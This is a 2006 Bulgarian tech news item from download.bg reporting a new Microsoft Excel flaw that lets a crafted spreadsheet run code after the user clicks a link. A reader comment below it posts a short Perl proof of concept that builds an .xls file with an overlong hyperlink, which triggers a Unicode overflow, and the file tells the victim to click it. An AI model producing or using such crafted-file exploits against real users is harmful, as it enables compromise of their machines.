download.bg
 Вход Списание  Новини  Програми  Статии  Форум  Чат   Абонамент  Топ95   Архив 
 
Търсачка

Търсене на новини по ключови думи

 

RSS захранване
 

Excel-ските документи също могат да бъдат опасни

21.06.2006 10:07 (преди 17 години и 10 месеца) | krum | показана 2016 пъти Статистики
Съмнителните Excel-ски и Word документи се оказват не по-малко опасни от стартиране на доброто старо заразено EXE.

Докато от Microsoft са съсредоточили усилията си в запушване на дупките по сигурността на тяхната операционна система и браузър, хакерите се оглеждат за нови полета на изява, където да пробият. Пакетът MS Office се оказва една апетитна среда. След като още миналата седмица Microsoft бяха сигнализирани и запушиха критична пролука в сигурността на редактора Word, а малко по-късно и в колегата му Excel, новата седмица им донесе новината за поредна уязвимост в Excel.
От Microsoft успокояват, че престъпниците не използват още новопоявилия се код за активни атаки, но чрез последната уязвимост могат да бъдат изпълнявани произволни програми на вашето РС. Подобно на злосторниците, възползващи се от предпоследната Excel-ска дупка, и тези разчитат, че потребителите ще отворят специално подготвен Excel-ски документ, но новата атака не е толкова опасна както предшественичката й. Това е така, понеже потребителят трябва да предприеме допълнително кликане върху линк.

Вижте още:

Мнения на потребители

Твоето мнение

  • Четвъртък, 22.06.06, 02:24, barov4e:
    Ето и един PoC:
    ###############################
    # excelsexywarez.pl
    # excel unicode overflow poc
    # by kcope in 2006
    # thanks to revoguard and alex
    ###############################
    use Spreadsheet::WriteExcel;
     
    my $workbook = Spreadsheet::WriteExcel->new("FUCK.xls");
     
    $worksheet = $workbook->add_worksheet();
     
    $format = $workbook->add_format();
    $format->set_bold();
    $format->set_color('red');
    $format->set_align('center');
     
    $col = $row = 5;
    $worksheet->write($row, $col, "kcope in da house! Click on the link!!!", $format);
     
    $a="AAAAAAAAAAAAAAAAAAAAAA\" x 500;
    $worksheet->write_url(0, 0, "$a", "LINK"); 

Платени препратки

bgERP
Управлявайте фирмата си
с безплатен, уеб базиран софтуер
www.bgerp.com
Яки графични станции
Рендиране в реално време
и на най-тежките обекти - от Перси ООД
www.persy.com
Рекламни чанти
Екстрапак произвежда рекламни чанти
и опаковки от хартия и (био)полимери
Bags.BG

вашето каре - тук

за нас | за разработчици | за реклама | станете автори | in english  © 1998-2024   Experta Ltd.